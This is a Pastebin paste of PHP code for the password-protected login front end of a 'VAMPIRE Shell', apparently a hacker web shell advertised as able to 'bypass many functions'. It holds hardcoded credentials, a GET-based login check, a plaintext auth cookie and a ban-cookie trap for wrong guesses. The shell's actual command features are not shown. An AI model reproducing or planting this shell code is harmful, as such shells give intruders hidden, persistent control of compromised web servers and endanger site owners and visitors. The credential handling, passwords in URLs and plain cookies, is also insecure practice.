Advertisement
Guest User

Pr8 Shell

a guest
Apr 27th, 2015
289
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.28 KB | None | 0 0
  1. <?php
  2. //-------------[ Config ]-------------\\
  3. $username = "VAMPIRE";
  4. $password = "HacKinG";
  5. //-------------[ Config ]-------------\\
  6. if ($_COOKIE['login'] != $username.":".$password) {
  7. if(!isset($_SESSION['log'])){
  8. if(!isset($_GET['username']) or empty($_GET['username']) or !isset($_GET['password']) or empty($_GET['password'])){
  9. if (!isset($_COOKIE["qsdqfsdfsdsdzeaze"])) {
  10. echo <<<loginform
  11. <!-- Login Form -->
  12. <title>VAMPIRE Shell</title>
  13. <!--
  14. VAMPIRE
  15. Bypass Many Functions
  16.  
  17.  
  18.  
  19. ##
  20. ##
  21. ###
  22. ####
  23. ####
  24. ## ####
  25. #### #####
  26. #### ###### ####
  27. ###### ########################
  28. #################################
  29. ###############################
  30. ################# ############
  31. ############ #########
  32. ######### # #########
  33. ######### ## ###########
  34. ########## # ############
  35. ########### #############
  36. ##### ##### ##### ######
  37. ###### #### ###### #######
  38. ###### ##### ##### #######
  39. ##### #### ##### ########
  40. ###### #### ##### ########
  41. ##### ##### ##### #########
  42. ##### #### #### # ######
  43. ##### #### ##### ## #####
  44. ##### #### #### ## ######
  45. #### #### ##### ######
  46. ##### #### ##### #######
  47. ##### #### ##### ######
  48. ##### #### ##### #######
  49. ##### #### ##### ######
  50. ##### #### #### ######
  51. ##### ### ##### ######
  52. ##### ### ##### ######
  53. ##### #### #### ######
  54. ##### #### ##### ######
  55. ##### #### ##### #######
  56. ###### #### ##### #######
  57. ####### #### #### ######
  58. ###### #### ##### #######
  59. ###### #### ###### #######
  60. ####### ### ###### #######
  61. ###### ######### ########
  62. ####### ######### ########
  63. ######## ######### ########
  64. ######## ######### #########
  65. ######## ######## #########
  66. ######### ######## #########
  67. ######### ######## ##########
  68. ################### ############
  69. ## ###############################
  70. # ##############################
  71. ## #############################
  72. # ######################### #
  73. # ###################### # #
  74. # # ################# #
  75. # ## ########## ## #
  76. # ### ###### # #
  77. ##### # #
  78. ##### # #
  79. #### # #
  80. ### ## #
  81. ### ## #
  82. ### #
  83. ### #
  84. #
  85.  
  86. -->
  87. <style>
  88. * { box-sizing: border-box; padding:0; margin: 0; }
  89.  
  90. body {
  91. font-family: "HelveticaNeue-Light","Helvetica Neue Light","Helvetica Neue",Helvetica,Arial,"Lucida Grande",sans-serif;
  92. color:white;
  93. font-size:12px;
  94. background:#1D1C1C ;
  95. }
  96.  
  97. form {
  98. background:#111;
  99. width:300px;
  100. margin:30px auto;
  101. border-radius:0.4em;
  102. border:1px solid #191919;
  103. overflow:hidden;
  104. position:relative;
  105. box-shadow: 0 5px 10px 5px rgba(0,0,0,0.2);
  106. }
  107.  
  108. form:after {
  109. content:"";
  110. display:block;
  111. position:absolute;
  112. height:1px;
  113. width:100px;
  114. left:20%;
  115. background:linear-gradient(left, #111, #444, #b6b6b8, #444, #111);
  116. top:0;
  117. }
  118.  
  119. form:before {
  120. content:"";
  121. display:block;
  122. position:absolute;
  123. width:8px;
  124. height:5px;
  125. border-radius:50%;
  126. left:34%;
  127. top:-7px;
  128. box-shadow: 0 0 6px 4px #fff;
  129. }
  130.  
  131. .inset {
  132. padding:20px;
  133. border-top:1px solid #19191a;
  134. }
  135.  
  136. form h1 {
  137. font-size:18px;
  138. text-shadow:0 1px 0 black;
  139. text-align:center;
  140. padding:15px 0;
  141. border-bottom:1px solid rgba(0,0,0,1);
  142. position:relative;
  143. }
  144.  
  145. form h1:after {
  146. content:"";
  147. display:block;
  148. width:250px;
  149. height:100px;
  150. position:absolute;
  151. top:0;
  152. left:50px;
  153. pointer-events:none;
  154. transform:rotate(70deg);
  155. -webkit-transform: rotate(70deg);
  156. background:linear-gradient(50deg, rgba(255,255,255,0.15), rgba(0,0,0,0));
  157. background-image: -webkit-linear-gradient(50deg, rgba(255,255,255,0.05), rgba(0,0,0,0)); /* For Safari */
  158.  
  159. }
  160.  
  161. label {
  162. color:#666;
  163. display:block;
  164. padding-bottom:9px;
  165. }
  166.  
  167. input[type=text],
  168. input[type=password] {
  169. width:100%;
  170. padding:8px 5px;
  171. background:linear-gradient(#1f2124, #27292c);
  172. border:1px solid #222;
  173. box-shadow:
  174. 0 1px 0 rgba(255,255,255,0.1);
  175. border-radius:0.3em;
  176. margin-bottom:20px;
  177. }
  178.  
  179. label[for=remember]{
  180. color:white;
  181. display:inline-block;
  182. padding-bottom:0;
  183. padding-top:5px;
  184. }
  185.  
  186. input[type=checkbox] {
  187. display:inline-block;
  188. vertical-align:top;
  189. }
  190.  
  191. .p-container {
  192. padding:0 20px 20px 20px;
  193. }
  194.  
  195. .p-container:after {
  196. clear:both;
  197. display:table;
  198. content:"";
  199. }
  200.  
  201. .p-container span {
  202. display:block;
  203. float:left;
  204. color:#0d93ff;
  205. padding-top:8px;
  206. }
  207.  
  208. input[type=submit] {
  209. padding:5px 20px;
  210. border:1px solid rgba(0,0,0,0.4);
  211. text-shadow:0 -1px 0 rgba(0,0,0,0.4);
  212. box-shadow:
  213. inset 0 1px 0 rgba(255,255,255,0.3),
  214. inset 0 10px 10px rgba(255,255,255,0.1);
  215. border-radius:0.3em;
  216. background:#27292c;
  217. color:white;
  218. float:right;
  219. font-weight:bold;
  220. cursor:pointer;
  221. font-size:13px;
  222. }
  223.  
  224. input[type=submit]:hover {
  225. box-shadow:
  226. inset 0 1px 0 rgba(255,255,255,0.3),
  227. inset 0 -10px 10px rgba(255,255,255,0.1);
  228. }
  229.  
  230. input[type=text]:hover,
  231. input[type=password]:hover,
  232. label:hover ~ input[type=text],
  233. label:hover ~ input[type=password] {
  234. background:#27292c;
  235. }
  236. </style>
  237. <br><br><br><br><br><br><br><br><br>
  238. <form method="get" action="">
  239. &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src="http://www11.0zz0.com/2014/08/23/06/983187840.png">
  240. <div class="inset">
  241. <p>
  242. <label for="username">USERNAME</label>
  243. <input type="text" name="username" id="username">
  244. </p>
  245. <p>
  246. <label for="password">PASSWORD</label>
  247. <input type="password" name="password" id="password">
  248. </p>
  249. </div>
  250. <p class="p-container">
  251. <input type="submit" name="go" id="go" value="Log in">
  252. </p>
  253. </form>
  254. loginform;
  255. }else {
  256. echo '
  257. <style>
  258. <style>
  259. * { box-sizing: border-box; padding:0; margin: 0; }
  260.  
  261. body {
  262. font-family: "HelveticaNeue-Light","Helvetica Neue Light","Helvetica Neue",Helvetica,Arial,"Lucida Grande",sans-serif;
  263. color:white;
  264. font-size:12px;
  265. background:#1D1C1C ;
  266. }
  267.  
  268. form {
  269. background:#111;
  270. width:300px;
  271. margin:30px auto;
  272. border-radius:0.4em;
  273. border:1px solid #191919;
  274. overflow:hidden;
  275. position:relative;
  276. box-shadow: 0 5px 10px 5px rgba(0,0,0,0.2);
  277. }
  278.  
  279. form:after {
  280. content:"";
  281. display:block;
  282. position:absolute;
  283. height:1px;
  284. width:100px;
  285. left:20%;
  286. background:linear-gradient(left, #111, #444, #b6b6b8, #444, #111);
  287. top:0;
  288. }
  289.  
  290. form:before {
  291. content:"";
  292. display:block;
  293. position:absolute;
  294. width:8px;
  295. height:5px;
  296. border-radius:50%;
  297. left:34%;
  298. top:-7px;
  299. box-shadow: 0 0 6px 4px #fff;
  300. }
  301.  
  302. .inset {
  303. padding:20px;
  304. border-top:1px solid #19191a;
  305. }
  306.  
  307. form h1 {
  308. font-size:18px;
  309. text-shadow:0 1px 0 black;
  310. text-align:center;
  311. padding:15px 0;
  312. border-bottom:1px solid rgba(0,0,0,1);
  313. position:relative;
  314. }
  315.  
  316. form h1:after {
  317. content:"";
  318. display:block;
  319. width:250px;
  320. height:100px;
  321. position:absolute;
  322. top:0;
  323. left:50px;
  324. pointer-events:none;
  325. transform:rotate(70deg);
  326. -webkit-transform: rotate(70deg);
  327. background:linear-gradient(50deg, rgba(255,255,255,0.15), rgba(0,0,0,0));
  328. background-image: -webkit-linear-gradient(50deg, rgba(255,255,255,0.05), rgba(0,0,0,0)); /* For Safari */
  329.  
  330. }
  331.  
  332. label {
  333. color:#666;
  334. display:block;
  335. padding-bottom:9px;
  336. }
  337.  
  338. input[type=text],
  339. input[type=password] {
  340. width:100%;
  341. padding:8px 5px;
  342. background:linear-gradient(#1f2124, #27292c);
  343. border:1px solid #222;
  344. box-shadow:
  345. 0 1px 0 rgba(255,255,255,0.1);
  346. border-radius:0.3em;
  347. margin-bottom:20px;
  348. }
  349.  
  350. label[for=remember]{
  351. color:white;
  352. display:inline-block;
  353. padding-bottom:0;
  354. padding-top:5px;
  355. }
  356.  
  357. input[type=checkbox] {
  358. display:inline-block;
  359. vertical-align:top;
  360. }
  361.  
  362. .p-container {
  363. padding:0 20px 20px 20px;
  364. }
  365.  
  366. .p-container:after {
  367. clear:both;
  368. display:table;
  369. content:"";
  370. }
  371.  
  372. .p-container span {
  373. display:block;
  374. float:left;
  375. color:#0d93ff;
  376. padding-top:8px;
  377. }
  378.  
  379. input[type=submit] {
  380. padding:5px 20px;
  381. border:1px solid rgba(0,0,0,0.4);
  382. text-shadow:0 -1px 0 rgba(0,0,0,0.4);
  383. box-shadow:
  384. inset 0 1px 0 rgba(255,255,255,0.3),
  385. inset 0 10px 10px rgba(255,255,255,0.1);
  386. border-radius:0.3em;
  387. background:#27292c;
  388. color:white;
  389. float:right;
  390. font-weight:bold;
  391. cursor:pointer;
  392. font-size:13px;
  393. }
  394.  
  395. input[type=submit]:hover {
  396. box-shadow:
  397. inset 0 1px 0 rgba(255,255,255,0.3),
  398. inset 0 -10px 10px rgba(255,255,255,0.1);
  399. }
  400.  
  401. input[type=text]:hover,
  402. input[type=password]:hover,
  403. label:hover ~ input[type=text],
  404. label:hover ~ input[type=password] {
  405. background:#27292c;
  406. }
  407. </style>
  408. <br><br><br><br><br><br><br>
  409. <center><img src="http://www.businesszone.co.uk/files/siftmedia-businesszone/images/BANNED-logo.png"></center>';
  410. }
  411. exit();
  412. }else{
  413. if($_GET['username'] == $username and $_GET['password'] == $password ){
  414. $_SESSION['log'] = 1;
  415. setcookie("login", $username.":".$password);
  416. header('Location: ?page=home');
  417. exit();
  418. }else{
  419. setcookie("qsdqfsdfsdsdzeaze", "khqsdgbqjshqsqsdqssdfs");
  420. header('Location: ?banned');
  421. exit();
  422.  
  423. }
  424. }
  425. }
  426. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement